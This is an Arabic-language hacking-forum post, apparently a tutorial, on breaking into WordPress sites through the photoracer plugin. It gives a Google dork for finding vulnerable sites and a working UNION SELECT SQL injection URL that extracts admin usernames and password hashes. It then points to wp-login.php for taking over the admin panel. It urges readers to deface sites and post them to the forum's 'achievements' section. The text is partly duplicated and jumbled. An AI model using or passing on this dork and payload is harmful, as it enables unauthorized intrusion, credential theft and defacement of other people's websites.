WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
السلام عليكم ورحمه الله وبركاته .
كيفكم . أخواني إن شاء الله الكل بخير ..
اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .
ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي . لوول ..
نبدأ بسم الله .:
أولا.:
الدوركـ .:
اي واحد الي يعجبــك ..
ثانيــأ.:
الإٍستغلال .:
بتسوي كذا على طول ...:
www.xxx.com/
انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..
بطلع لك الباسورد واليوزر تبع الادمن .. .:
مثال كامل . على الاستغلال .:
ثالثـأ.:
لوحـة التحكم .:
يالله ، بدي اشوف اندكسات لوول..
أخوكم .:
بالتوفيــــــــــــــق لــكــم ..
كيفكم . أخواني إن شاء الله الكل بخير ..
اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .
ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي . لوول ..
نبدأ بسم الله .:
أولا.:
الدوركـ .:
بتفتح قوقل كالعادة وبتحط الدورك وبتطلع لك مواقع واختارinurl:"wp-content/plugins/photoracer/viewimg.php?id="
اي واحد الي يعجبــك ..
ثانيــأ.:
الإٍستغلال .:
بتسوي كذا على طول ...:
يعني مثال .:PHP:wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
www.xxx.com/
انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..
بطلع لك الباسورد واليوزر تبع الادمن .. .:
مثال كامل . على الاستغلال .:
فهمـتووو كيف ياحلوين ..www.xxx.com/
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
ثالثـأ.:
لوحـة التحكم .:
بس بتسوي بعد رابط الموقع هيك .:
وبتطلع لك لوحـة التحكم ..... لوول ..wp-login.php
يالله ، بدي اشوف اندكسات لوول..
أخوكم .:
PHP:
Dr.NaNo
بالتوفيــــــــــــــق لــكــم ..
التعديل الأخير: